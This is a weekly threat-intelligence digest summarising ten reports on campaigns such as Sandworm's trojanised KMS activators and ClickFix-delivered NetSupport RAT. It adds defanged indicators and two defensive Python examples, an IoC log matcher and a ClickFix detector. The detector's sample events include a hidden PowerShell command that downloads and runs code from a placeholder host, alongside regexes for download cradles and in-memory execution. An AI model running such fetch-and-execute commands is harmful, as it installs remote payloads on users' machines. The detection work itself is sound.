Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 52 threat intelligence reports and compiled a brief summary along with the pertinent metadata extracted from them. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.

Title: Sandworm APT Targets Ukrainian Users with Trojanized Microsoft KMS Activation Tools in Cyber Espionage Campaigns
Link: https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns
Summary: The KMS Update Campaign, attributed to the Russian threat actor Sandworm (APT44), specifically targets Ukrainian Windows users who run pirated Microsoft Key Management Service (KMS) activators. Active since late 2023, the campaign uses trojanized software to distribute the BACKORDER loader, which in turn delivers Dark Crystal RAT (DcRAT) for cyber espionage and data exfiltration. BACKORDER poses as a legitimate KMS tool, disables security features such as Windows Defender and alters system settings so that it can operate stealthily. The campaign also deploys the Kalambur RDP backdoor, which mimics a Windows Update and establishes covert command-and-control channels. Sandworm's activity threatens not only individual users and businesses but also critical infrastructure in Ukraine, and the group's history points to significant risks to national security.
Threats: sandworm_group dcrat backorder kalambur uac-0145_group kmsauto_tool unc4166_group typosquatting_technique lolbas_technique lolbin_technique dwagent_tool

Title: NetSupport RAT Clickfix Distribution
Link: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
Summary: Since early January 2025, eSentire's Threat Response Unit has reported a significant increase in incidents involving the NetSupport Remote Access Trojan (RAT), which gives attackers extensive control over victims' systems. The malware is delivered through a social-engineering technique known as "ClickFix", in which deceptive browser alerts manipulate users into executing malicious PowerShell commands that install the RAT. The threat actors, identified as TA569 and SmartApe SG, use fake CAPTCHA pages to instruct users to download the NetSupport RAT client, which then enables real-time monitoring, data exfiltration and deployment of additional malware.
Threats: netsupportmanager_rat clickfix_technique fakecaptcha_technique smartape_sg_group ta569_group smartapesg_campaign

Title: Inside the Scam: North Korea's IT Worker Threat
Link: https://go.recordedfuture.com/hubfs/reports/cta-nk-2025-0213.pdf
Summary: PurpleBravo, a cyber threat group linked to North Korea, has focused on the cryptocurrency sector, targeting a market-making firm, an online casino and a blockchain software company. The group places fraudulent IT workers operating under false identities into remote roles, violating international sanctions and creating risks of fraud, data theft and operational disruption. Its operations are supported by a network of at least seven front companies in China and use malware such as BeaverTail, InvisibleFerret and OtterCookie to gather sensitive information and maintain persistent access to compromised systems. A January 2025 indictment from the US Department of Justice charged two North Korean nationals and three facilitators with targeting over 64 US companies and generating significant profits, showing that the activity reaches well beyond the cryptocurrency industry.
Threats: famous_chollima_group contagious_interview_campaign beavertail invisibleferret ottercookie tag-121_group supply_chain_technique smuggling_technique spear-phishing_technique

Title: Further insights into Ivanti CSA 4.6 vulnerabilities exploitation
Link: https://harfanglab.io/insidethelab/insights-ivanti-csa-exploitation/
Summary: CVE-2024-8963, a path traversal vulnerability in Ivanti's Cloud Service Appliance (CSA), allows remote unauthenticated attackers to reach restricted functionality by exploiting URL-parsing issues in the proprietary "broker" web server. First reported on September 19, 2024, further analysis tied the vulnerability to PHP configuration inconsistencies that let attackers execute restricted PHP files and chain additional vulnerabilities, including CVE-2024-8190 and CVE-2024-9379. Exploitation was documented from September to October 2024, with attackers deploying web shells for persistence and reusing familiar exploitation techniques against organizations in sectors such as manufacturing, healthcare and finance, particularly in the U.S. and France. The case highlights systemic weaknesses in web server design and configuration and suggests an organized effort by several threat actors to exploit these flaws for broader network access.
Threats: behinder godzilla_webshell arl_tool landesk_tool grok upx_tool supershell fscan_tool zerologon_vuln reversessh_tool any_support_tool

Title: Targeted Threats Research — South & North Korea (a breakdown of 3 years of civil society threat research in Korea)
Link: https://www.0x0v1.com/targeted-threats-research-south-north-korea/
Summary: The research documents escalating cyber threats to civil society organizations (CSOs) in South Korea, particularly from North Korean advanced persistent threats (APTs) such as APT37 and Kimsuky, which target activists, journalists and human rights defenders. These APTs rely on spear-phishing and advanced malware, including ROKRAT and the newly identified Android malware RambleOn, to collect sensitive information and infiltrate systems. The analysis stresses the critical role CSOs play in identifying these threats through their direct contact with victims, which yields insight into attack methodologies and patterns; it reveals a reliance on social engineering and on specific vulnerabilities such as CVE-2022-41128, and it highlights significant gaps in malware detection for these organizations.
Threats: rokrat superbear rambleon scarcruft_group ucid902_group ollydbg_tool windbg_tool spear-phishing_technique kimsuky_group divulge_stealer credential_harvesting_technique dll_injection_technique rtf_template_inject_technique lazarus_group upx_tool

Title: From South America to Southeast Asia: The Fragile Web of REF7707
Link: https://www.elastic.co/security-labs/fragile-web-ref7707
Summary: The REF7707 campaign targets a South American foreign ministry using advanced techniques and novel malware families, including FINALDRAFT, GUIDLOADER and PATHLOADER, and was first identified through unusual endpoint behaviour. FINALDRAFT is a remote administration tool that blends its command-and-control traffic with legitimate Microsoft services, complicating detection. The attackers used built-in Windows applications to download files, ran their activity through system-level scheduled tasks, and leveraged cloud services such as Google Firebase and Pastebin for payload delivery, all of which demonstrates a high level of operational sophistication and a troubling ability to evade traditional security measures.
Threats: ref7707_group seth_locker finaldraft guidloader pathloader lolbin_technique lolbas_technique credential_harvesting_technique siestagraph ref2924_group

Title: You've Got Malware: FINALDRAFT Hides in Your Drafts
Link: https://www.elastic.co/security-labs/finaldraft
Summary: Elastic Security Labs has detailed the malware behind REF7707, a campaign that targets a foreign ministry and uses Outlook, via the Microsoft Graph API, for command-and-control communications. The toolset comprises a custom loader named PATHLOADER and a backdoor called FINALDRAFT, with variants for both Windows PE and Linux environments, indicating ongoing development. PATHLOADER downloads and executes encrypted shellcode and employs anti-analysis techniques to evade detection, while FINALDRAFT, a 64-bit C++ application, focuses on data exfiltration and process manipulation, uses named pipes for communication and maintains a dynamic structure for its various operations. The investigation also found a Linux variant of FINALDRAFT that adapts the functionality to the Unix environment, albeit without certain Windows-specific capabilities.
Threats: finaldraft ref7707_group pathloader process_injection_technique typosquatting_technique siestagraph powerpick_tool passthehash_technique mimikatz_tool

Title: Tracking Pyramid C2: Identifying Post-Exploitation Servers in Hunt
Link: https://hunt.io/blog/tracking-pyramid-c2-identifying-post-exploitation-servers
Summary: Pyramid is an open-source post-exploitation server released on GitHub in 2023 and designed to evade endpoint detection and response (EDR) tools by leveraging the ubiquity of Python. It runs as a Python-based HTTP/S server for command-and-control and supports in-memory execution of tools such as BloodHound, which contributes to its stealth. In December 2024, The DFIR Report described the threat actor group TA4557 (FIN6) using Pyramid alongside Cobalt Strike to target job seekers with malware, while GuidePoint Security linked a RansomHub affiliate to a similar Python-based backdoor. Recent scans identified nine IP addresses attributed to Pyramid infrastructure, with distinctive HTTP headers confirming the server interactions; the findings reinforce Pyramid's role in active threats and illustrate how threat actors use legitimate software frameworks to avoid detection.
Threats: pyramid_c2 bloodhound_tool secretsdump_tool lazagne_tool cobalt_strike magecart_group more_eggs ransomhub

Title: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
Link: https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
Summary: Microsoft has identified a subgroup of the Russian state actor Seashell Blizzard whose activity it tracks as the "BadPilot campaign". Active since at least 2021, the subgroup primarily targets sensitive sectors such as energy, telecommunications and government worldwide. It exploits vulnerabilities in Internet-facing systems, with recent activity centred on vulnerabilities in ConnectWise ScreenConnect and Fortinet FortiClient EMS, and has also conducted destructive attacks on organizations supporting Ukraine. Its methods include credential harvesting and lateral movement within networks, using tunnelling utilities and modifications to network resources to maintain a persistent presence and increase operational effectiveness.
Threats: sandworm_group badpilot_campaign localolive chisel_tool connectwise_tool screenconnect_tool killdisk hermeticwiper supply_chain_technique eternal_petya prestige_ransomware cobalt_strike dcrat atera_tool splashtop_tool muddywater_group shadowlink_tool bitsadmin_tool procdump_tool cloaking_technique fancy_bear_group plink_tool rsockstun_tool aitm_technique sim_swapping_technique credential_harvesting_technique spear-phishing_technique proxyshell_vuln vssadmin_tool shadow_copies_delete_technique ntdsutil_tool nltest_tool

Title: China-linked Espionage Tools Used in Ransomware Attacks
Link: https://www.security.com/threat-intelligence/chinese-espionage-ransomware
Summary: In late 2024, a sophisticated attack involving RA World ransomware targeted an Asian software and services company using tools associated with China-based espionage actors. The intrusion began with exploitation of a vulnerability in Palo Alto Networks' PAN-OS firewall (CVE-2024-0012), followed by theft of Amazon S3 cloud credentials and deployment of a PlugX variant with links to the Chinese group Fireant. The incident marks a notable shift in tactics: it combines espionage techniques with a ransomware motive, evidenced by the attackers' demand for a $2 million ransom, and suggests that state-sponsored actors may be evolving toward financially motivated cybercrime.
Threats: ra-group_group plugx_rat red_delta_group bronze_starlight_group lockbit atomsilo nightsky

This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
# Threat Actor: Sandworm (APT44)
## Attribution & Identity
**Attribution:** Russian threat actor.
**Known Aliases and Associated Groups:** APT44, UAC-0145, UNC4166 (the latter two appear among the report's threat tags; Sandworm is the primary focus of the summary).
## Activity Summary
Sandworm is conducting the **KMS Update Campaign**, which began in late 2023. This operation specifically targets Ukrainian Windows users who utilize pirated Microsoft Key Management Service (KMS) activators. The goal appears to be cyber espionage and data exfiltration.
## Tactics, Techniques & Procedures
- **Delivery Mechanism:** Trojanized Microsoft KMS activation software (typosquatting technique).
- **Loader:** Utilizes the **BACKORDER** loader disguised as a legitimate KMS tool.
- **System Manipulation:** Disables security features like Windows Defender and manipulates system settings for stealth.
- **Backdoor Deployment:** Deploys the **Kalambur RDP backdoor**, which mimics a Windows Update mechanism to establish covert C2 channels.
- **Techniques Mentioned:** Typosquatting (lookalike update and activation domains) and LOLBAS/LOLBIN abuse; both appear among the report's threat tags, and the summary gives no further detail on the LOLBAS usage.
## Targeting
- **Sectors:** Individual users, businesses, and critically, **critical infrastructure in Ukraine**.
- **Geography:** **Ukraine**.
- **Victims:** Ukrainian Windows users utilizing pirated software.
## Tools & Infrastructure
- **Malware Families Used:**
  - BACKORDER (loader)
  - Dark Crystal RAT (DcRAT) (payload)
  - Kalambur RDP backdoor
  - DWAgent (listed among the report's threat tags)
- **Infrastructure (Defanged IOCs):**
  - **Domains:** `kalambur[.]net`, `2zilmiystfbjib2k4hvhpnv2uhni4ax5ce4xlpb7swkjimfnszxbkaid[.]onion`, `activationsmicrosoft[.]com`, `kmsupdate2023[.]com`, `kms-win11-update[.]net`, `windowsupdatesystem[.]org`, `ratiborus2023[.]com`, `onedrivestandaloneupdater[.]com`, `windowsdrivepack[.]com`, `akamaitechcdns[.]com`, `onedrivepack[.]com`
  - **IPs:** `5[.]255[.]122[.]118`
## Implications
The activities pose a significant threat to national security in Ukraine, given the targeting of critical infrastructure. The use of widely trusted avenues (KMS activators, Windows Updates) for malware delivery suggests a high potential for initial access and deep system compromise.
## Mitigations
- Users should avoid using pirated or unauthorized software activators (KMS tools).
- Maintain updated security software (Windows Defender) and monitor for signs of tampering or disabling.
- Monitor network traffic for connections to known C2 domains or unusual outbound communication mimicking Windows Update processes.
- Implement strict application whitelisting policies to limit execution from non-standard executables.
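The network-monitoring mitigation above is easier to operationalise once the report's defanged indicators are refanged and matched on whole DNS labels, so that a hit on `kmsupdate2023[.]com` also covers its subdomains while the legitimate `windowsupdate.com` never collides with `windowsupdatesystem[.]org`. The Python below is an added example, not RST Cloud's or EclecticIQ's code; the domains and IP are a subset of those listed in the Sandworm entry, while the log format (`query=`, `dst=`, `host=` fields) and the log lines themselves are constructed for the example.

```python
"""Refang the report's defanged IoCs and hunt for them in DNS/proxy logs.

Added example for this digest, not RST Cloud or EclecticIQ code. The domain
and IP indicators are taken from the Sandworm entry above; the log line layout
and the sample log are assumptions constructed for the example.
"""
import re
from typing import Iterable, Optional

REPORT_DOMAINS = [
    "kalambur[.]net",
    "activationsmicrosoft[.]com",
    "kmsupdate2023[.]com",
    "kms-win11-update[.]net",
    "windowsupdatesystem[.]org",
    "onedrivestandaloneupdater[.]com",
]
REPORT_IPS = ["5[.]255[.]122[.]118"]

_DEFANG_DOT = re.compile(r"[\[\(\{]\.[\]\)\}]")          # [.] (.) {.}
_DEFANG_SCHEME = re.compile(r"^hxxp(s?)://", re.IGNORECASE)
_HOST_FIELD = re.compile(r"\b(?:query|dst|host)=([A-Za-z0-9.\-]+)")  # assumed log fields


def refang(indicator: str) -> str:
    """Undo the defanging used in the report: '[.]' -> '.', 'hxxp' -> 'http'."""
    value = _DEFANG_DOT.sub(".", indicator.strip())
    value = _DEFANG_SCHEME.sub(r"http\1://", value)
    return value.lower()


class IocMatcher:
    """Exact IP matching plus domain matching that includes subdomains."""

    def __init__(self, domains: Iterable[str], ips: Iterable[str]) -> None:
        self.domains = {refang(d) for d in domains}
        self.ips = {refang(i) for i in ips}

    def match_host(self, host: str) -> Optional[str]:
        """Return the listed indicator that `host` hits, or None.

        Comparison is on whole label suffixes, never substrings: the lookup
        `update.kmsupdate2023.com` hits `kmsupdate2023.com`, while
        `windowsupdate.com` does not hit `windowsupdatesystem.org`.
        """
        host = host.lower().rstrip(".")
        if host in self.ips:
            return host
        labels = host.split(".")
        for i in range(len(labels) - 1):        # never test the bare TLD
            suffix = ".".join(labels[i:])
            if suffix in self.domains:
                return suffix
        return None

    def scan_log(self, lines: Iterable[str]) -> list[tuple[int, str, str]]:
        """Return (line_number, host_seen, indicator) for every hit in the log."""
        hits = []
        for n, line in enumerate(lines, start=1):
            for host in _HOST_FIELD.findall(line):
                ioc = self.match_host(host)
                if ioc:
                    hits.append((n, host.lower(), ioc))
        return hits


# Constructed sample: resolver and egress-proxy records from one workstation.
SAMPLE_LOG = """\
2025-02-14T09:58:11Z dns client=10.20.1.15 query=windowsupdate.com type=A
2025-02-14T09:58:40Z dns client=10.20.1.15 query=update.kmsupdate2023.com type=A
2025-02-14T09:58:41Z proxy client=10.20.1.15 dst=5.255.122.118 port=443 bytes=18422
2025-02-14T10:02:03Z dns client=10.20.1.22 query=login.microsoft.com type=A
2025-02-14T10:05:57Z proxy client=10.20.1.15 host=activationsmicrosoft.com port=80 bytes=922
""".splitlines()


def hunt() -> list[tuple[int, str, str]]:
    """Run the report indicators over the sample log."""
    return IocMatcher(REPORT_DOMAINS, REPORT_IPS).scan_log(SAMPLE_LOG)


if __name__ == "__main__":
    for line_no, host, ioc in hunt():
        print(f"line {line_no}: {host} -> matches report IoC {ioc}")
```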
***
# Threat Actor: TA569 / SmartApe SG (NetSupport RAT ClickFix Distribution)
## Attribution & Identity
**Attribution:** The eSentire Threat Response Unit attributes the activity to the threat actors TA569 and SmartApe SG; the summary gives no nation-state attribution.
## Activity Summary
eSentire has reported a significant increase in incidents since early January 2025 involving the **NetSupport Remote Access Trojan (RAT)**. Attackers rely on a social engineering technique labelled **"ClickFix"** to manipulate users into executing the malware themselves, which then gives the attackers control of the victim's system.
## Tactics, Techniques & Procedures
- **Delivery/Initial Access:** Deceptive browser alerts and fake CAPTCHA pages (ClickFix) instruct the user to execute a malicious PowerShell command that installs the NetSupport RAT client.
- **Technique:** **ClickFix** social engineering with fake CAPTCHA lures.
- **Impact:** Extensive control over victims' systems: real-time monitoring, data exfiltration and deployment of additional malware.
## Targeting
- **Sectors:** Not detailed in the summary.
- **Geography:** Not specified.
- **Victims:** Users who follow the fake CAPTCHA or browser-alert instructions and run the supplied command.
## Tools & Infrastructure
- **Malware Families Used:** NetSupport RAT (the NetSupport Manager remote-control software abused as a RAT)
- **Infrastructure (Defanged IOCs):**
  - **IPs:** `92[.]255[.]85[.]135`
  - **Domains:** `eveverify[.]com`, `findkik[.]com`, `sapeconomico[.]com`, `eiesoft[.]com`, `lynxcm[.]com`, `mellittler[.]com`, `hardcorelegends[.]com`, `fbinter[.]com`, `incomputersolutions[.]com`
## Implications
The prevalence of known commercial RATs like NetSupport, distributed via social engineering, indicates a persistent and easily adoptable threat vector utilized by various cybercriminals.
## Mitigations
- Increase user awareness training regarding social engineering tactics like "ClickFix."
- Restrict interactive PowerShell execution for standard users and alert when a shell is launched by the user in response to a browser prompt, the execution path ClickFix relies on.
- Restrict the use and execution of known remote access tools unless explicitly authorized.
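As an added example (not eSentire's code), the following Python scores process-creation events for the ClickFix pattern the advisory describes: a shell launched interactively by the user, assumed here to appear as a child of explorer.exe, whose command line carries download-and-execute or reassuring lure text. The event schema, the heuristics and their weights, and the sample events are all assumptions constructed for the example.

```python
"""Score process-creation events for ClickFix-style PowerShell execution.

Added example for this digest, not eSentire code. The event schema, the
heuristics and their weights, and the sample events are constructed
assumptions; tune the regexes and threshold to your own telemetry.
"""
import re
from dataclasses import dataclass

# Shells a ClickFix lure typically asks the user to paste a command into.
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parent that indicates an interactive user launch (Run dialog / desktop) rather
# than a script host, installer or service. Assumption for this example.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (signal name, pattern over the command line, weight)
HEURISTICS = [
    ("hidden_window", re.compile(r"-w(?:indow(?:style)?)?\s+hidden", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(r"(?:iwr|invoke-webrequest|downloadstring|net\.webclient)", re.I), 2),
    ("in_memory_exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    # Lures often append reassuring text so the pasted line looks harmless.
    ("captcha_lure_text", re.compile(r"(?:i am not a robot|verify you are human|captcha)", re.I), 3),
]
ALERT_THRESHOLD = 4   # an explorer launch alone (2) is not enough; one extra signal is.


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched signal names); (0, []) when the image is not a shell."""
    if _basename(ev.image) not in USER_SHELLS:
        return 0, []
    score, reasons = 0, []
    if _basename(ev.parent_image) in INTERACTIVE_PARENTS:
        score, reasons = 2, ["launched_from_explorer"]
    for name, pattern, weight in HEURISTICS:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(name)
    return score, reasons


def detect(events: list[ProcessEvent]) -> list[int]:
    """Indices of events whose score reaches ALERT_THRESHOLD."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= ALERT_THRESHOLD]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed telemetry: a scheduled admin script, a ClickFix-style paste, a
# user running ipconfig from the Run dialog, and a non-shell process.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iex (iwr -UseBasicParsing http://lure.example.invalid/v.txt)" '
                 "# I am not a robot - reCAPTCHA Verification ID: 8731"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig /all"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for i in detect(SAMPLE_EVENTS):
        score, reasons = score_event(SAMPLE_EVENTS[i])
        print(f"ALERT event {i}: score={score} signals={reasons}")
```

Only the pasted lure scores high enough to alert; the explorer-launched `cmd.exe /c ipconfig` stays below the threshold, which is the false-positive case the weighting is meant to handle.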
***
# Threat Actor: China-linked Espionage Actors / Fireant
## Attribution & Identity
**Attribution:** China-based espionage actors.
**Known Aliases and Associated Groups:** Fireant (linked via the PlugX variant); RA World (tagged ra-group_group), RedDelta and BronzeStarlight appear among the report's threat tags.
## Activity Summary
A sophisticated ransomware attack, utilizing the **RA World ransomware**, targeted an Asian software and services company in late 2024, demanding a $2 million ransom. This campaign merged espionage techniques with financially motivated ransomware deployment.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploited a vulnerability in **Palo Alto's PAN-OS firewall (CVE-2024-0012)**.
- **Post-Exploitation:** Stole **Amazon S3 cloud credentials**.
- **Deployment:** Deployed a **PlugX variant**.
- **Evolution:** Shift in tactics combining cyber espionage techniques with ransomware for financial gain.
## Targeting
- **Sectors:** Software and services company.
- **Geography:** Asia.
- **Victims:** An unspecified Asian software and services company.
## Tools & Infrastructure
- **Malware Families Used:**
  - RA World (ransomware)
  - PlugX variant (backdoor/loader)
- **Infrastructure (Defanged IOCs):**
  - **Domains:** `plugins[.]jetbrians[.]net`, `police[.]tracksyscloud[.]com`, `caco[.]blueskyanalytics[.]net`
  - **IPs:** `158[.]247[.]213[.]167`, `154[.]223[.]18[.]123`
## Implications
This signals an evolution among state-sponsored actors, adopting ransomware for direct financial payoff rather than purely intelligence gathering, increasing the financial risk profile associated with these actors. Effective patching of perimeter defenses (like PAN-OS) is crucial.
## Mitigations
- Immediately patch Palo Alto PAN-OS instances against **CVE-2024-0012**.
- Implement strong credential hygiene for cloud environments (Amazon S3) using MFA and least privilege access.
- Enhance network monitoring to detect indicators related to PlugX activity post-exploitation.